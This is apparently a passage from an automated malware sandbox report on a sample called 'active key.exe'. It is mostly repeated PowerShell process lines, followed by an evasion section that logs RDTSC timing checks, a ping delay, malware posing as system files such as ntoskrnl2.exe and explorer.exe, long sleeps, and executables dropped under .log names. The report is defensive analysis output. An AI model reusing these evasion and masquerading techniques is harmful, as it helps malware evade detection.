                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\Desktop\active key.exeRDTSC instruction interceptor: First address: 7FF6E98B6EAA second address: 7FF6E98B6EB0 instructions: 0x00000000 rdtsc 0x00000002 pop ebx 0x00000003 dec ecx 0x00000004 bswap ebx 0x00000006 rdtsc
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: C:\Windows\System32\ntoskrnl2.exeMemory allocated: A70000 memory reserve | memory write watch
                    Source: C:\Windows\System32\ntoskrnl2.exeMemory allocated: 1A8B0000 memory reserve | memory write watch
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeMemory allocated: 14F0000 memory reserve | memory write watch
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeMemory allocated: 1B200000 memory reserve | memory write watch
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeMemory allocated: AD0000 memory reserve | memory write watch
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeMemory allocated: 1A7D0000 memory reserve | memory write watch
                    Source: C:\Windows\System32\ntoskrnl2.exeMemory allocated: 1070000 memory reserve | memory write watch
                    Source: C:\Windows\System32\ntoskrnl2.exeMemory allocated: 1AF40000 memory reserve | memory write watch
                    Source: C:\Windows\System32\ntoskrnl2.exeMemory allocated: F90000 memory reserve | memory write watch
                    Source: C:\Windows\System32\ntoskrnl2.exeMemory allocated: 1ADD0000 memory reserve | memory write watch
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeMemory allocated: 29A0000 memory reserve | memory write watch
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeMemory allocated: 1AB90000 memory reserve | memory write watch
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeMemory allocated: 14B0000 memory reserve | memory write watch
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeMemory allocated: 1AFA0000 memory reserve | memory write watch
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 600000
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 599885
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 599781
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 599672
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 599562
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 599426
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 599267
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 599141
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 598940
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 3600000
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 598828
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 598719
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 598609
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 598500
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 598390
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 598280
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 598159
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 598047
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 597935
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 597827
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 597719
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 597605
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 597500
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 597383
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 597272
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 597156
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 597044
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 596934
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 596806
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 596701
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 596594
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 596469
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 596341
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 596234
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 596123
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 595999
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 595890
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 595776
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 595672
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 595547
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 595437
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 595317
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 595200
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 595078
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 594968
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 594855
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 594748
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 594535
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 593719
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 593589
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 593484
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 592930
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3267
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3082
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3627
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3315
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2757
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2634
                    Source: C:\Windows\System32\ntoskrnl2.exeWindow / User API: threadDelayed 4324
                    Source: C:\Windows\System32\ntoskrnl2.exeWindow / User API: threadDelayed 5459
                    Source: C:\Windows\System32\ntoskrnl2.exeDropped PE file which has not been started: C:\Users\user\Desktop\DnHERPdP.log
                    Source: C:\Windows\System32\ntoskrnl2.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZHsakaRB.log
                    Source: C:\Windows\System32\ntoskrnl2.exeDropped PE file which has not been started: C:\Users\user\Desktop\mlzPodne.log
                    Source: C:\Windows\System32\ntoskrnl2.exeDropped PE file which has not been started: C:\Users\user\Desktop\aAtQiRdB.log
                    Source: C:\Windows\System32\ntoskrnl2.exeDropped PE file which has not been started: C:\Users\user\Desktop\hCHhiobl.log
                    Source: C:\Windows\System32\ntoskrnl2.exeDropped PE file which has not been started: C:\Users\user\Desktop\UZXJUHSP.log
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 5732Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7344Thread sleep count: 3267 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7348Thread sleep count: 3082 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7384Thread sleep count: 3627 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7764Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7448Thread sleep count: 3315 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7564Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7400Thread sleep count: 2757 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7732Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7624Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7428Thread sleep count: 2634 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7608Thread sleep time: -922337203685477s >= -30000s
